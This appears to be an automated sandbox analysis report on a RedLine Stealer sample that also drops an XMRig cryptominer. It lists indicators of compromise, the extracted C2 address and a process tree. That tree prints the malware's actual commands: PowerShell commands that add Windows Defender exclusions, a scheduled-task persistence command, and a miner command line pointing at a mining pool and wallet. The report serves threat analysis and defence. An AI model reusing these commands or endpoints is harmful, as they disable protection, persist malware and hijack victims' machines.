Analysis
-
max time kernel
151s -
max time network
143s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
07-12-2021 17:10
Static task
static1
General
-
Target
75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe
-
Size
863KB
-
MD5
669afee3432ad5f508a2c593610725e8
-
SHA1
9735d6ac5053b9eed2b6fffc37696707e94061dd
-
SHA256
75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5
-
SHA512
6034bca1ca5b3c8cd15b29b295e841afb0eb3320084c34c63ad704334577de9422cddbbe062d41c0289d817df8bf50e204eb27e9d66721793bdab62058bbbb5e
Malware Config
Extracted
redline
91.243.32.50:63948
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1292-120-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1292-121-0x000000000041BB2E-mapping.dmp family_redline -
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3124-282-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/3124-297-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
WindowsDefender.exeJava.exeRuntimeBroker.exeservices64.exesihost64.exepid process 596 WindowsDefender.exe 376 Java.exe 3984 RuntimeBroker.exe 1228 services64.exe 3636 sihost64.exe -
Drops startup file 1 IoCs
Processes:
RuntimeBroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 4 IoCs
Processes:
Java.exeservices64.exedescription ioc process File created C:\Windows\system32\services64.exe Java.exe File opened for modification C:\Windows\system32\services64.exe Java.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe services64.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exeservices64.exedescription pid process target process PID 2828 set thread context of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 1228 set thread context of 3124 1228 services64.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3952 596 WerFault.exe WindowsDefender.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegAsm.exeJava.exepowershell.exeWindowsDefender.exepowershell.exeservices64.exepowershell.exesvchost.exepowershell.exeWerFault.exepid process 1292 RegAsm.exe 376 Java.exe 2976 powershell.exe 596 WindowsDefender.exe 596 WindowsDefender.exe 596 WindowsDefender.exe 2976 powershell.exe 2976 powershell.exe 1292 RegAsm.exe 1292 RegAsm.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1228 services64.exe 1228 services64.exe 2308 powershell.exe 2308 powershell.exe 2308 powershell.exe 3124 svchost.exe 3124 svchost.exe 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3952 WerFault.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe 3124 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
RegAsm.exeJava.exepowershell.exeWindowsDefender.exeRuntimeBroker.exepowershell.exeservices64.exepowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 1292 RegAsm.exe Token: SeDebugPrivilege 376 Java.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 596 WindowsDefender.exe Token: 35 3984 RuntimeBroker.exe Token: SeIncreaseQuotaPrivilege 2976 powershell.exe Token: SeSecurityPrivilege 2976 powershell.exe Token: SeTakeOwnershipPrivilege 2976 powershell.exe Token: SeLoadDriverPrivilege 2976 powershell.exe Token: SeSystemProfilePrivilege 2976 powershell.exe Token: SeSystemtimePrivilege 2976 powershell.exe Token: SeProfSingleProcessPrivilege 2976 powershell.exe Token: SeIncBasePriorityPrivilege 2976 powershell.exe Token: SeCreatePagefilePrivilege 2976 powershell.exe Token: SeBackupPrivilege 2976 powershell.exe Token: SeRestorePrivilege 2976 powershell.exe Token: SeShutdownPrivilege 2976 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeSystemEnvironmentPrivilege 2976 powershell.exe Token: SeRemoteShutdownPrivilege 2976 powershell.exe Token: SeUndockPrivilege 2976 powershell.exe Token: SeManageVolumePrivilege 2976 powershell.exe Token: 33 2976 powershell.exe Token: 34 2976 powershell.exe Token: 35 2976 powershell.exe Token: 36 2976 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeIncreaseQuotaPrivilege 1788 powershell.exe Token: SeSecurityPrivilege 1788 powershell.exe Token: SeTakeOwnershipPrivilege 1788 powershell.exe Token: SeLoadDriverPrivilege 1788 powershell.exe Token: SeSystemProfilePrivilege 1788 powershell.exe Token: SeSystemtimePrivilege 1788 powershell.exe Token: SeProfSingleProcessPrivilege 1788 powershell.exe Token: SeIncBasePriorityPrivilege 1788 powershell.exe Token: SeCreatePagefilePrivilege 1788 powershell.exe Token: SeBackupPrivilege 1788 powershell.exe Token: SeRestorePrivilege 1788 powershell.exe Token: SeShutdownPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeSystemEnvironmentPrivilege 1788 powershell.exe Token: SeRemoteShutdownPrivilege 1788 powershell.exe Token: SeUndockPrivilege 1788 powershell.exe Token: SeManageVolumePrivilege 1788 powershell.exe Token: 33 1788 powershell.exe Token: 34 1788 powershell.exe Token: 35 1788 powershell.exe Token: 36 1788 powershell.exe Token: SeDebugPrivilege 1228 services64.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeLockMemoryPrivilege 3124 svchost.exe Token: SeLockMemoryPrivilege 3124 svchost.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe Token: SeRestorePrivilege 2308 powershell.exe Token: SeShutdownPrivilege 2308 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exeRegAsm.exeJava.execmd.execmd.execmd.exeservices64.execmd.exedescription pid process target process PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe PID 1292 wrote to memory of 596 1292 RegAsm.exe WindowsDefender.exe PID 1292 wrote to memory of 596 1292 RegAsm.exe WindowsDefender.exe PID 1292 wrote to memory of 376 1292 RegAsm.exe Java.exe PID 1292 wrote to memory of 376 1292 RegAsm.exe Java.exe PID 376 wrote to memory of 500 376 Java.exe cmd.exe PID 376 wrote to memory of 500 376 Java.exe cmd.exe PID 500 wrote to memory of 2976 500 cmd.exe powershell.exe PID 500 wrote to memory of 2976 500 cmd.exe powershell.exe PID 376 wrote to memory of 1416 376 Java.exe cmd.exe PID 376 wrote to memory of 1416 376 Java.exe cmd.exe PID 1292 wrote to memory of 3984 1292 RegAsm.exe RuntimeBroker.exe PID 1292 wrote to memory of 3984 1292 RegAsm.exe RuntimeBroker.exe PID 1416 wrote to memory of 3132 1416 cmd.exe schtasks.exe PID 1416 wrote to memory of 3132 1416 cmd.exe schtasks.exe PID 500 wrote to memory of 1788 500 cmd.exe powershell.exe PID 500 wrote to memory of 1788 500 cmd.exe powershell.exe PID 376 wrote to memory of 2068 376 Java.exe cmd.exe PID 376 wrote to memory of 2068 376 Java.exe cmd.exe PID 2068 wrote to memory of 1228 2068 cmd.exe services64.exe PID 2068 wrote to memory of 1228 2068 cmd.exe services64.exe PID 1228 wrote to memory of 2116 1228 services64.exe cmd.exe PID 1228 wrote to memory of 2116 1228 services64.exe cmd.exe PID 2116 wrote to memory of 2308 2116 cmd.exe powershell.exe PID 2116 wrote to memory of 2308 2116 cmd.exe powershell.exe PID 1228 wrote to memory of 3636 1228 services64.exe sihost64.exe PID 1228 wrote to memory of 3636 1228 services64.exe sihost64.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe PID 2116 wrote to memory of 1268 2116 cmd.exe powershell.exe PID 2116 wrote to memory of 1268 2116 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe"C:\Users\Admin\AppData\Local\Temp\75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 596 -s 17484⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Java.exe"C:\Users\Admin\AppData\Local\Temp\Java.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
5b17a7a44faa0e687e03d67431f312da
SHA1881de933daac79c99066785ae4af18d9d82ea57a
SHA2569652bc7f37b2703bbe1777628332e6e11a0d2e18ca1597aa989c2526df15aa33
SHA512146245348e34870ba4b9ed8e017ab2e3b0363c59e9d9ebbe15bf0576f4490da6056d7868c8b7924c66638e79075a5b16d85f4e5b9aac579fc47b6704509100fe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
aeac747c804bb9193fb2a4bef2ed3b03
SHA16d18913d50c2ca520a460902ea611b23b994654c
SHA25654ede086c49869a169a51de91a2f3b8ae85765bc6dc6c883b71cb24b496234b5
SHA512be46fabe9c1e7807283088e09ff525681664f6955af12e75b84b4f9fca8c56dc3a99e84643278d5d0c4e5ebe5a8492ca04985834062e961286156b1bb09777dd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e8d42b7e2ae1172eccd84d20ae14642f
SHA1ff4ef5d5430a95c1f1490381628fbe39c8995896
SHA2569bb361218f686d38f5b265076464d57597a36fe685e05dce1e4fc2fb165e843a
SHA512056da1c57678025233658014ee36b04297bb592fbdb20742084a650ab2a42c6f81daa88739a66c0fee9cfff620e711aa8cb32ebe346021d3165920d6b06d833c
-
C:\Users\Admin\AppData\Local\Temp\Java.exeMD5
dbdcba032867d48ebab99abcbdb217f5
SHA19fb3a411252e02a09dc40c923cbd599c54c377bf
SHA2569b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA5129cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
C:\Users\Admin\AppData\Local\Temp\Java.exeMD5
dbdcba032867d48ebab99abcbdb217f5
SHA19fb3a411252e02a09dc40c923cbd599c54c377bf
SHA2569b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA5129cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exeMD5
c9c8df33087231faec96c4381c8ac70c
SHA1f8fba3eb9dd9bc0483e8052d6fd02145ed645a5a
SHA256f2ed472b058788a5faaeacd18a02fbf8d7cee8f8a93812fdcae53c5656118c6f
SHA512221d0a71234a62ea52a7f9a45c60067ef7d0675d6e4e5bd2283941aca31cffbd8e8aa5909e098867f67bd02c5e20add0e7f1e722f0ebf8dc755b5ccd3c1eadc7
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exeMD5
c9c8df33087231faec96c4381c8ac70c
SHA1f8fba3eb9dd9bc0483e8052d6fd02145ed645a5a
SHA256f2ed472b058788a5faaeacd18a02fbf8d7cee8f8a93812fdcae53c5656118c6f
SHA512221d0a71234a62ea52a7f9a45c60067ef7d0675d6e4e5bd2283941aca31cffbd8e8aa5909e098867f67bd02c5e20add0e7f1e722f0ebf8dc755b5ccd3c1eadc7
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
819c13238cf641935b8a8a70ea1e9fd1
SHA1cb1019f3efa0178a1556b578572d2a818d018ff0
SHA2561a16d707abed6b9664fe9ad5de4ed134387c5f785ec969dfaec54ec2c3fbf7fe
SHA512c5cab13acffe6727fc9f66cfb745e0db3db571cc55a072e41c5e1931b3272f0f1b2cc626f90955decd872f0cb86bade017a6a9ca60aad0c10a4ccf9a544de2dd
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
819c13238cf641935b8a8a70ea1e9fd1
SHA1cb1019f3efa0178a1556b578572d2a818d018ff0
SHA2561a16d707abed6b9664fe9ad5de4ed134387c5f785ec969dfaec54ec2c3fbf7fe
SHA512c5cab13acffe6727fc9f66cfb745e0db3db571cc55a072e41c5e1931b3272f0f1b2cc626f90955decd872f0cb86bade017a6a9ca60aad0c10a4ccf9a544de2dd
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
ef3d9e1c88032ad42198642596cf23c8
SHA1619cf4f348c93abe92a356060a670d9eb13416be
SHA256a854e14d77bba877ca4598cfba35e30f72dbeff7161ba4f380c1c11bf173cce6
SHA512ba65651f56312fa868c8e476bcd185cf9c6876ac2658a6df47fd5493fb00a6c356be9626c3cea3abe581f097f41a377247865380a48a4a201afa03b5fb4ad382
-
C:\Windows\System32\services64.exeMD5
dbdcba032867d48ebab99abcbdb217f5
SHA19fb3a411252e02a09dc40c923cbd599c54c377bf
SHA2569b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA5129cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
C:\Windows\system32\Microsoft\Libs\sihost64.exeMD5
ef3d9e1c88032ad42198642596cf23c8
SHA1619cf4f348c93abe92a356060a670d9eb13416be
SHA256a854e14d77bba877ca4598cfba35e30f72dbeff7161ba4f380c1c11bf173cce6
SHA512ba65651f56312fa868c8e476bcd185cf9c6876ac2658a6df47fd5493fb00a6c356be9626c3cea3abe581f097f41a377247865380a48a4a201afa03b5fb4ad382
-
C:\Windows\system32\services64.exeMD5
dbdcba032867d48ebab99abcbdb217f5
SHA19fb3a411252e02a09dc40c923cbd599c54c377bf
SHA2569b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA5129cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
memory/376-148-0x0000000000FD0000-0x0000000000FD1000-memory.dmpFilesize
4KB
-
memory/376-153-0x0000000001180000-0x0000000001182000-memory.dmpFilesize
8KB
-
memory/376-146-0x0000000000590000-0x0000000000591000-memory.dmpFilesize
4KB
-
memory/376-143-0x0000000000000000-mapping.dmp
-
memory/500-149-0x0000000000000000-mapping.dmp
-
memory/596-157-0x000002A04E1F0000-0x000002A04E4EC000-memory.dmpFilesize
3.0MB
-
memory/596-350-0x00007FFBD4CB0000-0x00007FFBD4E8B000-memory.dmpFilesize
1.9MB
-
memory/596-138-0x0000000000000000-mapping.dmp
-
memory/596-172-0x000002A033F60000-0x000002A033F62000-memory.dmpFilesize
8KB
-
memory/596-141-0x000002A033860000-0x000002A033861000-memory.dmpFilesize
4KB
-
memory/596-347-0x000002A033F64000-0x000002A033F66000-memory.dmpFilesize
8KB
-
memory/596-195-0x000002A033F62000-0x000002A033F64000-memory.dmpFilesize
8KB
-
memory/596-167-0x000002A033EF0000-0x000002A033EF1000-memory.dmpFilesize
4KB
-
memory/1228-265-0x000000001C7B0000-0x000000001C7B2000-memory.dmpFilesize
8KB
-
memory/1228-243-0x0000000000000000-mapping.dmp
-
memory/1268-342-0x000001F43E078000-0x000001F43E079000-memory.dmpFilesize
4KB
-
memory/1268-308-0x000001F43E070000-0x000001F43E072000-memory.dmpFilesize
8KB
-
memory/1268-335-0x000001F43E076000-0x000001F43E078000-memory.dmpFilesize
8KB
-
memory/1268-302-0x0000000000000000-mapping.dmp
-
memory/1268-310-0x000001F43E073000-0x000001F43E075000-memory.dmpFilesize
8KB
-
memory/1292-127-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/1292-124-0x00000000056A0000-0x00000000056A1000-memory.dmpFilesize
4KB
-
memory/1292-129-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/1292-130-0x00000000061B0000-0x00000000061B1000-memory.dmpFilesize
4KB
-
memory/1292-126-0x00000000051A0000-0x00000000051A1000-memory.dmpFilesize
4KB
-
memory/1292-137-0x0000000006F00000-0x0000000006F01000-memory.dmpFilesize
4KB
-
memory/1292-125-0x0000000002C20000-0x0000000002C21000-memory.dmpFilesize
4KB
-
memory/1292-128-0x0000000005090000-0x0000000005696000-memory.dmpFilesize
6.0MB
-
memory/1292-121-0x000000000041BB2E-mapping.dmp
-
memory/1292-131-0x0000000005440000-0x0000000005441000-memory.dmpFilesize
4KB
-
memory/1292-120-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1292-132-0x0000000005560000-0x0000000005561000-memory.dmpFilesize
4KB
-
memory/1292-133-0x0000000005530000-0x0000000005531000-memory.dmpFilesize
4KB
-
memory/1292-134-0x0000000005E20000-0x0000000005E21000-memory.dmpFilesize
4KB
-
memory/1292-135-0x0000000006AE0000-0x0000000006AE1000-memory.dmpFilesize
4KB
-
memory/1292-136-0x00000000071E0000-0x00000000071E1000-memory.dmpFilesize
4KB
-
memory/1416-159-0x0000000000000000-mapping.dmp
-
memory/1788-239-0x0000020A617C6000-0x0000020A617C8000-memory.dmpFilesize
8KB
-
memory/1788-240-0x0000020A617C8000-0x0000020A617C9000-memory.dmpFilesize
4KB
-
memory/1788-213-0x0000020A617C3000-0x0000020A617C5000-memory.dmpFilesize
8KB
-
memory/1788-212-0x0000020A617C0000-0x0000020A617C2000-memory.dmpFilesize
8KB
-
memory/1788-199-0x0000000000000000-mapping.dmp
-
memory/1788-201-0x0000020A5F9B0000-0x0000020A5F9B2000-memory.dmpFilesize
8KB
-
